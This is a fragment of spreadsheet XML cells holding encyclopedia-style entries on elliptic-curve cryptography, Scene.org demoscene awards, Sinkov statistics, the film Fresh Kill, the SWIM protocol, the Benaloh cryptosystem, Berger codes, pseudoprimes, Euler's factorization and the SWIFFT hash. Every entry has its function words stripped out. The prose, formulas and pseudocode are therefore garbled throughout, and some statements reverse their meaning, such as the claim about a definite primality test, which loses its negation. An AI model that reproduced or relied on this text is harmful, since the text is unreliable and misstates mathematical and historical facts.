ecc-systems danger fault attacks, especially running smart cards. backdoors cryptographic experts expressed concerns national security agency inserted kleptographic backdoor least elliptic curve-based pseudo random generator. internal memos leaked former contractor edward snowden suggest backdoor dual drbg standard. analysis possible backdoor concluded adversary possession algorithm's secret could obtain encryption keys given bytes prng output.the safecurves project launched order catalog curves easy securely implement designed fully publicly verifiable minimize chance backdoor. quantum computing attacks shor's algorithm used break elliptic curve cryptography computing discrete logarithms hypothetical quantum computer. latest quantum resource estimates breaking curve 256-bit modulus (128-bit security level) 2330 qubits billion toffoli gates. binary elliptic curve, necessary qubits break bits security). comparison, using shor's algorithm break algorithm requires 4098 qubits trillion toffoli gates 2048-bit key, suggesting easier target quantum computers rsa. figures vastly exceed quantum computer ever built, estimates place creation computers decade away.supersingular isogeny diffie–hellman exchange provides post-quantum secure form elliptic curve cryptography using isogenies implement diffie–hellman exchanges. this exchange uses much field arithmetic existing elliptic curve cryptography requires computational transmission overhead similar many currently used public systems.in august 2015, announced planned transition distant future" cipher suite resistant quantum attacks. "unfortunately, growth elliptic curve bumped fact continued progress research quantum computing, necessitating re-evaluation cryptographic strategy." invalid curve attack when used virtual machines, attacker invalid curve complete private key. patents least scheme (ecmqv) implementation techniques covered patents. alternative representations alternative representations elliptic curves include: hessian curves edwards curves twisted curves twisted hessian curves twisted edwards curve doubling-oriented doche–icart–kohel curve tripling-oriented doche–icart–kohel curve jacobian curve montgomery curves also notes references jacques vélu, courbes elliptiques (...), société mathématique france, 1-152, paris, 1978. external links elliptic curves stanford university interactive introduction elliptic curves elliptic curve cryptography sage maike massierer cryptool team</t>
  </si>
  <si>
    <t>Scene.org</t>
  </si>
  <si>
    <t>scene.org (also known international scene organization) non-profit organization, providing currently largest demoscene file repository. founded 1996 jaakko "mellow-d" manninen, though originally existed ftp.fm.org, ftp-server releases group five musicians. 1997, re-opened scene.org. after hornet archive closed september 1998, scene.org became prominent demoscene-ftp available quickly became host many releases well.the scene.org servers hosted rotterdam, local university. they measure 150-200 traffic 2006) host demoscene-related data june 2013). main server mirrored onto various others, residing different countries. currently sponsored among others, pixar. awards 2003, scene.org established scene.org awards given annually creators best demos intros year. winners (except public's choice category) selected jury, consisting acclaimed sceners around globe. awarding ceremony traditionally held breakpoint demo party., however first september 2010, announced 2011 award would held gathering. scene.org awards project however ended assembly 2012. categories awards hosted following categories: best demo best intro best intro (from 2004) best effects best graphics best soundtrack best direction most original concept breakthrough performance best technical achievement (from 2009) public's choice (from 2004) best demo oldschool platform (from 2005) winners nominations note: year signifies release year products ceremony always held following year. kewlers moppi tied awards four each. nominated firm kewlers total nominations. group least nomination every year, 2006. planet risk lifeforce, andromeda software development, demos best demo public's choice time. 2006 best demo track fairlight deities five finger discount shitfaced clowns sts-02: electric kool-aid synesthetics starstruck black lotus best intro chaos theory conspiracy memento conspiracy dead ringer fairlight meet family fairlight aesterozoa kewlers best intro glitterati fairlight parazonantikum calodox polarfield fuzzion michinygma limp ninja artefacts plush best animation unclear throat pluisje surprise (egon dönci last earth!?) aenima lloco exceed mice monsters junk tits have escaped pluisje best demo oldskool platform error resource dreams skool invitro maker sundown invite trans*form focus wild bunch instinct, triad, horizon focus artefacts plush best effects evolution vision andromeda software development track fairlight liquid lust fairlight deities five finger discount shitfaced clowns best graphics starstruck black lotus project 2501 addict aeterna luceat ephidrena track fairlight fr-049: spirits taken farbrausch vacuum best soundtrack 1995 kewlers animal attraction andromeda software development track fairlight deities starstruck black lotus best direction starstruck black lotus chaos theory conspiracy track fairlight deities ewigkeit schmerzt neuro most original concept skool invitro maker sundown invite evolution vision andromeda software development captive andromeda software development trans*form focus ewigkeit schmerzt neuro breakthrough performance iterate imbusy xerxes balance adapt solaris kiss assembler brainstorm blur mindlapse remembrance dolphin's dream vovoid public's choice 1995 kewlers animal attraction andromeda software development chaos theory conspiracy derealization dead hackers society starstruck black lotus 2005 best demo aether final audition plastic iconoclast andromeda software development ocean machine black lotus sts-04: instant synesthetics best intro guevara fairlight binary flow assembly'05 invitation conspiracy death taxes fairlight fiat homo traction memories brain control best intro parsec frenetic anorgatronikum calodox noxie loonies panoptriptikum calodox synchroplastikum calodox best effects aether i'am seed cyberpunks unity inward iconoclast andromeda software development newton never this, bitch shitfaced clowns sts-04: instant synesthetics best graphics ocean machine black lotus don't stop portal process final audition plastic perfect love lkcc bauknecht best soundtrack ocean machine black lotus aether fair play queen candela iconoclast andromeda software development sts-04: instant synesthetics best direction poison exceed guevara fairlight fairplay queen candela iconoclast andromeda software development perfect love lkcc bauknecht most original concept ballet dancer antifact limp ninja barn digital artists bugtro mostly harmless hello:friend fairlight breakthrough performance fairplay queen candela memories brain control shizzle team pokeme tannhauser gate cubicle trocken bauknecht best demo oldskool platform boogie factor fairlight hello:friend fairlight i'am seed cyberpunks unity inward million lightyears from earth fairlight throckmorton device triad public's choice iconoclast andromeda software development aether final audition plastic ocean machine black lotus sts-04: instant synesthetics 2004 best demo planet risk andromeda software development coma dance floor) cocoon cell kewlers x-mix 2004 kewlers arise stravaganza silkcut black lotus best intro prophecy project nemesis conspiracy beyond conspiracy kings playground evoke 2004 invitation equinox fresh! fairlight paradise rgba best intro micropolis mainloop feet4 angeles observation armada finnmark ephidrena fabric frenetic best effects 47'111.0 faktory planet risk andromeda software development cell kewlers assembly 2004 invitation moppi productions arise stravaganza best graphics your fingers gently skin plastic interceptor black maiden coma dance floor) cocoon arise stravaganza silkcut black lotus best soundtrack coma dance floor) cocoon planet risk andromeda software development cell kewlers x-mix 2004 kewlers assembly 2004 invitation moppi productions best direction amondo aenima interceptor black maiden kings playground evoke 2004 invitation equinox assembly 2004 invitation moppi productions arise stravaganza silkcut black lotus most original concept assembly 2004 invitation moppi productions panjabmoore meets again calodox 8088 corruption hornet x-mix 2004 kewlers traction traction breakthrough performance syntonic dentiforms nesnausk michera limp ninja synthematik outracks glowsick portal process traction public's choice planet risk andromeda software development prophecy project nemesis conspiracy kings playground evoke 2004 invitation equinox cell kewlers silkcut black lotus 2003 best demo moppi productions doomsday complex fr-025: popular demo farbrausch protozoa kewlers significant deformation near cranium kewlers best intro fr-030: candytron farbrausch zoom3 cybermag project genesis conspiracy fr-034 hjb-104: time index farbrausch haujobb point blank stockholm syndrome best intro yellow rose texas bandwagon acid sponge freestyle mojo dreams frenetic robotic warrior best effects aura laura soopadoopa zoom3 cybermag doomsday complex fr-025: popular demo farbrausch significant deformation near cranium kewlers best graphics relais kolor fr-031: faded memories farbrausch significant deformation near cranium kewlers grafikal jihad mankind moppi productions best soundtrack significant deformation near cranium kewlers dreamchild andromeda software development fr-025: popular demo farbrausch protozoa kewlers pornonoise lunix best direction moppi productions place called universe conspiracy electricity edit lunix feel like computer melon dezign staying pictures tpolm most original concept moppi productions heart shaped haujobb protozoa kewlers feel like computer melon dezign staying pictures tpolm breakthrough performance project genesis conspiracy political statement with well hidden message matt current anderung spontz point blank stockholm syndrome phloam unique public's choice fr-025: popular demo farbrausch zoom3 cybermag dreamchild andromeda software development protozoa kewlers moppi productions 2002 best demo variform kewlers confessions cocoon planet loop madwizards nah-kolor halla moppi productions little nell black lotus best intro planet potion potion squish fr-019: poem horse farbrausch gracchus kolor freestyle salmiakki tpolm best effects variform kewlers fr-019: poem horse farbrausch deepness planet potion potion degrees shade yodel best graphics confessions cocoon liquid... wen? haujobb planet loop madwizards nah-kolor halla moppi productions little nell black lotus best soundtrack variform kewlers retrograde black maiden liquid... wen? haujobb planet potion potion little nell black lotus best direction thumb tpolm visual approach aesthetics techno neuro.concept variform kewlers halla moppi productions amour orion most original concept easter orion +1-1 superjam superheroes mandarine fr-029: dopplerdefekt farbrausch chimera halcyon breakthrough performance squish petroleo boah paradise coming rgba this stravaganza suspend references bibliography grenfell, paul 2010). "scene.org awards". game developer. (5): issn 1073-922x. external links official website awards</t>
  </si>
  <si>
    <t>Sinkov statistic</t>
  </si>
  <si>
    <t>sinkov statistics, also known log-weight statistics, specialized field statistics developed abraham sinkov, working small signal intelligence service organization, primary mission compile codes ciphers u.s. army. mathematics involved include modular arithmetic, number theory, linear algebra dimensions matrices, combinatorics, little statistics.sinkov explain theoretical underpinnings statistics, characterized distribution, give decision procedure accepting rejecting candidate plaintexts basis scores. situation becomes difficult comparing strings different lengths sinkov explain distribution statistics changes length, especially applied higher-order grams. accept reject candidate plaintext, sinkov simply said possibilities pick highest value. although procedure works applications, inadequate applications require on-line decisions. furthermore, desirable meaningful interpretation values. references</t>
  </si>
  <si>
    <t>Fresh Kill</t>
  </si>
  <si>
    <t>fresh kill 1994 experimental film directed cheang written jessica hagedorn. stars sarita choudhury erin mcmurtry shareen lightfoot claire mayakovsky, lesbian parents drawn corporate conspiracy involving fresh kills landfill. fresh kill official selection 1994 berlin international film festival toronto international film festival noted influence hacker subculture, article film now-defunct hacker publication infonation containing first uses term "hacktivism". synopsis shareen lightfoot claire mayakovsky raise daughter honey near fresh kills landfill staten island york city. shareen works salvager recovering refuse landfill, claire works waitress sushi restaurant. city heavily contaminated pollution adversely affects local animals food; claire brings home contaminated fish restaurant eaten honey, begins glowing green vanishes. shareen claire discover multinational corporation responsible pollution honey's disappearance, become involved effort hack expose company sushi chef hacker jiannbin lui, poet dishwasher miguel flores. cast sarita choudhury shareen lightfoot erin mcmurtry claire mayakovsky abraham jiannbin josé zúñiga miguel flores laurie carlos mimi mayakovsky will kempe stuart sterling nelini stamp honey rino thunder clayton lightfoot production fresh kill directed cheang written jessica hagedorn. film bills "eco cyber noia", term "cyber noia" "cybernoia") coined cheang describe "massive intrusions networking technology people's lives," foresaw future multinational media empires clash hackers." cheang stated film motivated desire depict relationship media environmental racism, drawing parallels dumping industrial toxic waste third world "the dumping garbage programs" third world countries. hagedorn stated wished invert typical expectations cliché stock characters, though sought "reverse things sake," noting honey's parentage differing races characters direct biological relations specifically never explained. release film premiered april 1994 film festival, official selection 1994 berlin international film festival toronto international film festival. released theatrically united states january 1996. fresh kill also screened whitney biennial 1995, asian american international film festival 2019. critical response legacy fresh kill described cheang work eco-cybernoia. environment inability access media change causes uprising low-fi activism hacker mentality, “hacktivism” will. review angeles times, critic kevin thomas offered praise cheang's direction hagedorn's writing, noting film's "interaction deteriorating environment, burgeoning cyberspace mounting urban paranoia [...] create vividly contemporary background" "gentle lesbian love story." quad cinema, film u.s. premiere, called fresh kill underseen radical feminist gem" favorably compared brazil born flames. conversely, janet maslin york times offered praise film's soundtrack described fresh kill "aimless, arty self-indulgence carried remarkable extreme," nathan rabin a.v. club surmised film "too confused disjointed anything well-intentioned, intermittently interesting failure."the film noted themes solidarity marginalized groups racism sexism; condemnation transnational capitalism; depiction "resistance circulates networks originally designed facilitate exchange labor, commodities, capital." analysis fresh kill, gina marchetti notes film depicts "the emancipatory potential digital," offering "hope seizing means communication reflecting production providing image radical media empowerment inspire others." film noted influence hacker subculture, 1995 article film now-defunct hacker publication infonation containing first uses term "hacktivism". references external links fresh kill imdb</t>
  </si>
  <si>
    <t>SWIM Protocol</t>
  </si>
  <si>
    <t>scalable weakly consistent infection-style process group membership (swim) protocol group membership protocol based "outsourced heartbeats" used distributed systems, first introduced indranil gupta 2001. hybrid algorithm combines failure detection group membership dissemination. protocol protocol components, failure detector component dissemination component. failure detector component functions follows: every time units, node {\displaystyle n_{1}} sends ping random node {\displaystyle n_{2}} membership list. {\displaystyle n_{1}} receives response {\displaystyle n_{2}} {\displaystyle n_{2}} decided healthy updates "last heard from" timestamp {\displaystyle n_{2}} current time. {\displaystyle n_{1}} receive response, {\displaystyle n_{1}} contacts nodes list {\displaystyle \{n_{3},...,n_{3+k}\}} requests ping {\displaystyle n_{2}} units time: successful response received, {\displaystyle n_{1}} marks {\displaystyle n_{2}} failed.the dissemination component functions follows: upon {\displaystyle n_{1}} detecting failed node {\displaystyle n_{2}} {\displaystyle n_{1}} sends multicast message rest nodes membership list, information failed node. voluntary requests node enter/leave group also sent multicast. properties protocol provides following guarantees: strong completeness: full completeness guaranteed (e.g. crash-failure node group eventually detected live nodes). detection time: expected value detection time (from node failure detection) {\displaystyle t'{\dot {}}{\frac {1}{1-e^{-q_{f}}}}} {\displaystyle length protocol period, {\displaystyle q_{f}} fraction non-faulty nodes group. extensions original swim paper lists following extensions make protocol robust: suspicion: nodes unresponsive ping messages initially marked failed. instead, marked "suspicious"; nodes discover "suspicious" node still send multicast nodes including mechanism. "suspicious" node responds ping time-out threshold, "alive" message sent multicast remove "suspicious" label node. infection-style dissemination: instead propagating node failure information multicast, protocol messages piggybacked ping messages used determine node liveness. this equivalent gossip dissemination. round-robin probe target selection: instead randomly picking node probe protocol time step, protocol modified node performs round-robin selection probe target. this bounds worst-case detection time protocol, without degrading average detection time. also failure detector crash (computing) references</t>
  </si>
  <si>
    <t>Benaloh cryptosystem</t>
  </si>
  <si>
    <t>benaloh cryptosystem extension goldwasser-micali cryptosystem (gm) created 1985 josh (cohen) benaloh. main improvement benaloh cryptosystem longer blocks data encrypted once, whereas encrypted individually. scheme definition like many public cryptosystems, scheme works group {\displaystyle (\mathbb /n\mathbb )^{*}} product large primes. this scheme homomorphic hence malleable. generation given block size public/private pair generated follows: choose large primes {\displaystyle r\vert (p-1),\operatorname {gcd} (r,(p-1)/r)=1,} {\displaystyle \operatorname {gcd} (r,(q-1))=1} {\displaystyle n=pq,\phi =(p-1)(q-1)} choose {\displaystyle y\in \mathbb _{n}^{*}} {\displaystyle y^{\phi /r}\not \equiv 1\mod .note: composite, pointed fousse 2011 conditions (i.e., stated original paper) insufficient guarantee correct decryption, i.e., guarantee {\displaystyle d(e(m))=m} cases case). address this, authors propose following check: {\displaystyle r=p_{1}p_{2}\dots p_{k}} prime factorization choose {\displaystyle y\in \mathbb _{n}^{*}} factor {\displaystyle p_{i}} case {\displaystyle y^{\phi /p_{i}}\neq 1\mod .set {\displaystyle x=y^{\phi /r}\mod public {\displaystyle y,n} private {\displaystyle \phi message encryption encrypt message {\displaystyle m\in \mathbb _{r}} choose random {\displaystyle u\in \mathbb _{n}^{*}} {\displaystyle e_{r}(m)=y^{m}u^{r}\mod message decryption decrypt ciphertext {\displaystyle c\in \mathbb _{n}^{*}} compute {\displaystyle a=c^{\phi /r}\mod output {\displaystyle m=\log _{x}(a)} i.e., find {\displaystyle x^{m}\equiv a\mod understand decryption, first notice {\displaystyle m\in \mathbb _{r}} {\displaystyle u\in \mathbb _{n}^{*}} have: {\displaystyle a=(c)^{\phi /r}\equiv (y^{m}u^{r})^{\phi /r}\equiv (y^{m})^{\phi /r}(u^{r})^{\phi /r}\equiv (y^{\phi /r})^{m}(u)^{\phi }\equiv (x)^{m}(u)^{0}\equiv x^{m}\mod recover take discrete base small, recover exhaustive search, i.e. checking {\displaystyle x^{i}\equiv a\mod {\displaystyle 0\dots (r-1)} larger values baby-step giant-step algorithm used recover {\displaystyle o({\sqrt {r}})} time space. security security scheme rests higher residuosity problem, specifically, given factorization unknown, computationally infeasible determine whether residue i.e. exists {\displaystyle z\equiv x^{r}\mod references</t>
  </si>
  <si>
    <t>Berger code</t>
  </si>
  <si>
    <t>telecommunication, berger code unidirectional error detecting code, named inventor, berger. berger codes detect unidirectional errors. unidirectional errors errors flip ones zeroes zeroes ones, asymmetric channels. check bits berger codes computed counting zeroes information word, expressing number natural binary. information word consists {\displaystyle bits, berger code needs {\displaystyle k=\lceil \log _{2}(n+1)\rceil "check bits", giving berger code length k+n. words, {\displaystyle check bits enough check {\displaystyle n=2^{k}-1} information bits). berger codes detect number one-to-zero bit-flip errors, long zero-to-one errors occurred code word. similarly, berger codes detect number zero-to-one bit-flip errors, long one-to-zero bit-flip errors occur code word. berger codes cannot correct error. like unidirectional error detecting codes, berger codes also used delay-insensitive circuits. unidirectional error detection stated above, berger codes detect number unidirectional errors. given code word, errors occurred all) bits value changed value transformation detected berger code implementation. understand why, consider three cases: some information part code word changed some bits check redundant) portion code word changed some bits information check portions changed 0s.for case number 0-valued bits information section will, definition error, increase. therefore, berger check code lower actual 0-bit-count data, check fail. case number 0-valued bits information section stayed same, value check data changed. since know turned turned (that's defined error model case), encoded binary value check data (e.g., binary 1011 1010, 1001, 0011). since information data stayed same, number zeros before, longer match mutated check value. case bits changed information check sections, notice number zeros information section gone described case binary value stored check portion gone down, described case therefore, chance mutating become different valid code word. similar analysis performed, perfectly valid, case errors occur 0-valued bits change therefore, errors occur specific codeword occur direction, errors detected. next code word transmitted (for instance), errors opposite direction, still detected, long direction other. unidirectional errors common certain situations. instance, flash memory, bits easily programmed reset references berger (march 1961). note error detection code asymmetric channels". information control. (1): 68–73. doi:10.1016/s0019-9958(61)80037-5. subhasish mitra edward mccluskey, "which concurrent error detection scheme choose?", center reliable computing, stanford university, 2000. citeseerx: 10.1.1.9.2021 verhoeff (march 1988). "delay-insensitive codes overview] (pdf). distributed computing. (1): 1–8. doi:10.1007/bf01788562.</t>
  </si>
  <si>
    <t>Euler pseudoprime</t>
  </si>
  <si>
    <t>arithmetic, composite integer called euler pseudoprime base coprime, {\displaystyle a^{(n-1)/2}\equiv 1{\pmod {n}}} (where refers modulo operation). motivation definition fact prime numbers satisfy equation deduced fermat's little theorem. fermat's theorem asserts prime, coprime ap−1 (mod suppose prime, expressed integer. thus, a(2q+1) (mod means (mod this factored 1)(aq (mod equivalent a(p−1)/2 (mod equation tested rather quickly, used probabilistic primality testing. these tests twice strong tests based fermat's little theorem. every euler pseudoprime also fermat pseudoprime. possible produce definite test primality based whether number euler pseudoprime exist absolute euler pseudoprimes, numbers euler pseudoprimes every base relatively prime themselves. absolute euler pseudoprimes subset absolute fermat pseudoprimes, carmichael numbers, smallest absolute euler pseudoprime 1729 7×13×19. relation euler–jacobi pseudoprimes slightly stronger condition {\displaystyle a^{(n-1)/2}\equiv \left({\frac {a}{n}}\right){\pmod {n}}} composite, greatest common divisor equals (a/n) jacobi symbol, common definition euler pseudoprime. see, example, page book koblitz listed below, page book riesel, page 1003 discussion numbers form found euler–jacobi pseudoprime. there absolute euler–jacobi pseudoprimes.: 1004 strong probable prime test even stronger euler-jacobi test takes computational effort. because advantage euler-jacobi test, prime-testing software often based strong test. implementation function eulertest(k) return false elseif return true else (modpow(a,(k-1)/2,k) (modpow(a,(k-1)/2,k) k-1) return true else return false examples least euler pseudoprime base also probable prime references koblitz, course number theory cryptography", springer-verlag, 1987. riesel, "prime numbers computer methods factorisation", birkhäuser, boston, mass., 1985.</t>
  </si>
  <si>
    <t>Euler's factorization method</t>
  </si>
  <si>
    <t>euler's factorization method technique factoring number writing squares different ways. example number 1000009 {\displaystyle 1000009} written 1000 {\displaystyle 1000^{2}+3^{2}} {\displaystyle 972^{2}+235^{2}} euler's method gives factorization 1000009 3413 {\displaystyle 1000009=293\cdot 3413} idea distinct representations positive integer lead factorization apparently first proposed marin mersenne. however, extensively hundred years later euler. celebrated method bears name factor number 1000009 {\displaystyle 1000009} apparently previously thought prime even though pseudoprime major primality test. euler's factorization method effective fermat's integers whose factors close together potentially much efficient trial division find representations numbers sums squares reasonably easily. euler's development ultimately permitted much efficient factoring numbers and, 1910s, development large factor tables going million. methods used find representations numbers sums squares essentially finding differences squares fermat's factorization method. disadvantage limitation great disadvantage euler's factorization method cannot applied factoring integer prime factor form occurring power prime factorization, number never squares. even composite numbers form often product primes form (e.g. 3053 cannot factored euler's method. this restricted applicability made euler's factorization method disfavoured computer factoring algorithms, since user attempting factor random integer unlikely know whether euler's method actually applied integer question. relatively recently attempts develop euler's method computer algorithms specialised numbers known euler's method applied. theoretical basis brahmagupta–fibonacci identity states product sums squares squares. euler's method relies theorem viewed converse, given {\displaystyle n=a^{2}+b^{2}=c^{2}+d^{2}} find {\displaystyle product sums squares. first deduce {\displaystyle a^{2}-c^{2}=d^{2}-b^{2}} factor sides {\displaystyle (a-c)(a+c)=(d-b)(d+b)} (1)now {\displaystyle k=\operatorname {gcd} (a-c,d-b)} {\displaystyle h=\operatorname {gcd} (a+c,d+b)} exists constants {\displaystyle l,m,l',m'} satisfying {\displaystyle (a-c)=kl} {\displaystyle (d-b)=km} {\displaystyle \operatorname {gcd} (l,m)=1} {\displaystyle (a+c)=hm'} {\displaystyle (d+b)=hl'} {\displaystyle \operatorname {gcd} (l',m')=1} substituting equation gives {\displaystyle klhm'=kmhl'} canceling common factors yields {\displaystyle lm'=l'm} using fact {\displaystyle (l,m)} {\displaystyle \left(l',m'\right)} pairs relatively prime numbers, find {\displaystyle l=l'} {\displaystyle m=m'} {\displaystyle (a-c)=kl} {\displaystyle (d-b)=km} {\displaystyle (a+c)=hm} {\displaystyle (d+b)=hl} {\displaystyle m=\operatorname {gcd} (a+c,d-b)} {\displaystyle l=\operatorname {gcd} (a-c,d+b)} applying brahmagupta–fibonacci identity {\displaystyle \left(k^{2}+h^{2}\right)\left(l^{2}+m^{2}\right)=(kl+hm)^{2}+(km-hl)^{2}={\bigl (}(a-c)+(a+c){\bigr )}^{2}+{\bigl (}(d-b)-(d+b){\bigr )}^{2}=(2a)^{2}+(2b)^{2}=4n.} factor squares, must contain even numbers: either {\displaystyle (k,h)} {\displaystyle (l,m)} without loss generality, assume pair {\displaystyle (k,h)} even. factorization becomes {\displaystyle n=\left(\left({\tfrac {k}{2}}\right)^{2}+\left({\tfrac {h}{2}}\right)^{2}\right)\left(l^{2}+m^{2}\right).\,} worked example since: 1000009 1000 {\displaystyle 1000009=1000^{2}+3^{2}=972^{2}+235^{2}} formula above: thus, 1000009 {\displaystyle 1000009=\left[\left({\frac {4}{2}}\right)^{2}+\left({\frac {34}{2}}\right)^{2}\right]\cdot \left[\left({\frac {14}{2}}\right)^{2}+\left({\frac {116}{2}}\right)^{2}\right]\,} {\displaystyle =\left(2^{2}+17^{2}\right)\cdot \left(7^{2}+58^{2}\right)\,} 3364 {\displaystyle =(4+289)\cdot (49+3364)\,} 3413 {\displaystyle =293\cdot 3413\,} pseudocode function euler_factorize(int list[int] is_prime(n) print("number factorable") exit function for-loop a=ceiling(sqrt(n)) floor(sqrt(b2)) b*b==b2 break loop preserving a*a+b*b!=n print("failed find expression squares") exit function for-loop c=a+1 c=ceiling(sqrt(n)) floor(sqrt(d2)) d*d==d2 break loop preserving c*c+d*d!=n print("failed find second expression squares") exit function c-a, b-d, gcd(a,c)//2, gcd(b,d)//2 gcd(a,d)//2, gcd(b,c)//2 factor1 factor2 return list[ factor1, factor2 references ore, oystein (1988). "euler's factorization method". number theory history. 59–64. isbn 978-0-486-65620-5. mckee, james (1996). "turning euler's factoring method factoring algorithm". bulletin london mathematical society. (28): 351–355. doi:10.1112/blms/28.4.351.</t>
  </si>
  <si>
    <t>SWIFFT</t>
  </si>
  <si>
    <t>cryptography, swifft collection provably secure hash functions. based concept fast fourier transform (fft). swifft first hash function based fft, sets apart providing mathematical proof security. also uses basis reduction algorithm. shown finding collisions swifft least difficult finding short vectors cyclic/ideal lattices worst case. giving security reduction worst-case scenario difficult mathematical problem, swifft gives much stronger security guarantee cryptographic hash functions. unlike many provably secure hash functions, algorithm quite fast, yielding throughput 40mbit/s intel pentium although swifft satisfies many desirable cryptographic statistical properties, designed "all-purpose" cryptographic hash function. example, pseudorandom function, would suitable instantiation random oracle. algorithm less efficient traditional hash functions give proof collision-resistance. therefore, practical would mostly applications proof collision-resistance particularly valuable, digital signatures must remain trustworthy long time. modification swifft called swifftx proposed candidate sha-3 function nist hash function competition rejected first round. algorithm algorithm follows: polynomial variable called {\displaystyle \alpha input: message {\displaystyle length {\displaystyle convert {\displaystyle collection {\displaystyle polynomials {\displaystyle p_{i}} certain polynomial ring {\displaystyle binary coefficients. compute fourier coefficients {\displaystyle p_{i}} using swifft. define fourier coefficients {\displaystyle a_{i}} fixed depend family swifft. point-wise multiply fourier coefficients {\displaystyle p_{i}} fourier coefficients {\displaystyle a_{i}} {\displaystyle inverse obtain {\displaystyle polynomials {\displaystyle f_{i}} degree {\displaystyle &lt;2n} compute {\displaystyle f=\sum _{i=1}^{m}(f_{i})} modulo {\displaystyle {\displaystyle \alpha ^{n}+1} convert {\displaystyle {\displaystyle n\log(p)} bits output it.the operation step easy invert, performed achieve diffusion, input bits. linear combination step achieves confusion, since compresses input. this high level description algorithm does, advanced optimizations used finally yield high performing algorithm. example choose concrete values parameters follows: 257. parameters, fixed compression function family takes binary input length 1024 bits (128 bytes), output range {\displaystyle \mathbb _{p}^{n}} size {\displaystyle p^{n}=257^{64}} output {\displaystyle \mathbb _{p}^{n}} easily represented using bits bytes). algebraic description swifft functions described simple algebraic expression polynomial ring {\displaystyle family functions depends three main parameters: {\displaystyle power {\displaystyle m&gt;0} small integer, {\displaystyle p&gt;0} modulus (not necessarily prime, convenient choose prime). define {\displaystyle ring {\displaystyle r=\mathbb _{p}[\alpha ]/(\alpha ^{n}+1)} i.e., ring polynomials {\displaystyle \alpha integer coefficients, modulo {\displaystyle {\displaystyle \alpha ^{n}+1} element {\displaystyle written polynomial degree {\displaystyle coefficients {\displaystyle \mathbb _{p}} certain function swifft family specified {\displaystyle fixed elements {\displaystyle a_{1},\ldots ,a_{m}\in ring {\displaystyle called multipliers. function corresponds following equation ring {\displaystyle \sum _{i=1}^{m}(a_{i}\cdot x_{i})} {\displaystyle x_{1},\ldots ,x_{m}\in polynomials binary coefficients, corresponding binary input length {\displaystyle computing polynomial product compute expression, main problem compute polynomial products {\displaystyle a_{i}\cdot x_{i}} fast compute products given convolution theorem. this says certain restrictions following holds: {\displaystyle {\mathcal {f}}\{f*g\}={\mathcal {f}}\{f\}\cdot {\mathcal {f}}\{g\}} here {\displaystyle {\mathcal {f}}} denotes fourier transform {\displaystyle \cdot denotes pointwise product. general case convolution theorem {\displaystyle denote multiplication convolution. however shown polynomial multiplication convolution. fast fourier transform finding fourier transform (fast fourier transform) finds transform {\displaystyle o(n\log(n))} time. multiplication algorithm goes follows: compute (all once) fourier coefficients polynomial. then pointwise multiply respective fourier coefficients polynomials, finally inverse return polynomial degree {\displaystyle &lt;2n} number-theoretic transform instead normal fourier transform, swifft uses number-theoretic transform. number-theoretic transform uses roots unity {\displaystyle \mathbb _{p}} instead complex roots unity. make work, need ensure {\displaystyle \mathbb _{p}} finite field, primitive 2nth roots unity exist field. this done taking {\displaystyle prime {\displaystyle divides {\displaystyle p-1} parameter choice parameters m,p,n subject following restrictions: must power must prime must multiple {\displaystyle \log(p)} must smaller (otherwise output smaller input)a possible choice n=64, m=16, p=257. throughput 40mbit/s, security {\displaystyle 2^{106}} operations finding collisions, digest size bits. statistical properties (universal hashing). swifft family functions universal. means fixed distinct {\displaystyle x,x'} probability (over random choice {\displaystyle family) {\displaystyle f(x)=f(x')} inverse size range. (regularity). swifft family compression functions regular. function {\displaystyle said regular input {\displaystyle chosen uniformly random domain, output {\displaystyle f(x)} distributed uniformly range. (randomness extractor). swifft randomness extractor. hash tables related applications, usually desirable outputs hash function distributed uniformly close uniformly possible), even inputs uniform. hash functions give guarantees known randomness extractors, distill non-uniform randomness input (almost) uniformly distributed output. formally, randomness extraction actually property family functions, function chosen random (and obliviously input). cryptographic properties security swifft pseudorandom, linearity. function {\displaystyle family inputs {\displaystyle x_{1}} {\displaystyle x_{2}} {\displaystyle x_{1}+x_{2}} also valid input, {\displaystyle f(x_{1})+f(x_{2})=f(x_{1}+x_{2})} this relation unlikely hold random function, adversary easily distinguish functions random function. claimed authors swifft functions behave like random oracle. function said behave like random oracle acts like truly random function. this differs pseudorandomness function fixed public. swifft family provably collision resistant asymptotic sense), relatively mild assumption worst-case difficulty finding short vectors cyclic/ideal lattices. this implies family also second preimage resistant. theoretical security swifft example provably secure cryptographic hash function. security proofs, security proof swifft relies reduction certain difficult solve mathematical problem. note means security swifft relies strongly difficulty mathematical problem. reduction case swifft problem finding short vectors cyclic/ideal lattices. proven following holds: suppose algorithm random version swifft given {\displaystyle find collisions {\displaystyle within feasible time {\displaystyle probability {\displaystyle allowed algorithm works small noticeable fraction family swifft. then find also algorithm {\displaystyle f_{2}} always find short vector ideal lattice ring {\displaystyle \mathbb _{p}[\alpha ]/(\alpha ^{n}+1)} feasible time {\displaystyle t_{2}} depending {\displaystyle {\displaystyle this means finding collisions swifft least difficult worst-case scenario finding short vectors lattice {\displaystyle \mathbb _{p}[\alpha ]/(\alpha ^{n}+1)} moment fastest algorithms finding short vectors exponential {\displaystyle note ensures significant "weak instances" security swifft weak. this guarantee given provably secure hash functions. practical security known working attacks generalized birthday attack, takes 2106 operations inversion attacks takes 2448 operations standard parameter choice. this usually considered enough render attack adversary infeasible. references</t>
  </si>
  <si>
    <t>Parvaresh–Vardy code</t>
  </si>
  <si>
    <t>parvaresh–vardy codes family error-correcting codes first described 2005 farzad parvaresh alexander vardy. they used efficient list-decoding. also reed–solomon code folded reed–solomon code references</t>
  </si>
  <si>
    <t>Euler–Jacobi pseudoprime</t>
  </si>
  <si>
    <t>number theory, integer called euler–jacobi probable prime (or, commonly, euler probable prime) base coprime, {\displaystyle a^{(n-1)/2}\equiv \left({\frac {a}{n}}\right){\pmod {n}}} {\displaystyle \left({\frac {a}{n}}\right)} jacobi symbol. composite integer satisfies congruence, called euler–jacobi pseudoprime (or, commonly, euler pseudoprime) base properties motivation definition fact prime numbers satisfy equation, explained euler's criterion article. equation tested rather quickly, used probabilistic primality testing. these tests twice strong tests based fermat's little theorem. every euler–jacobi pseudoprime also fermat pseudoprime euler pseudoprime. there numbers euler–jacobi pseudoprimes bases carmichael numbers are. solovay strassen showed every composite least bases less euler–jacobi pseudoprime.the smallest euler–jacobi pseudoprime base 561. there 11347 euler–jacobi pseudoprimes base less 25·109 (see oeis: a047713) (page 1005 literature (for example,), euler–jacobi pseudoprime defined often called simply euler pseudoprime. also probable prime references</t>
  </si>
  <si>
    <t>Superstabilization</t>
  </si>
  <si>
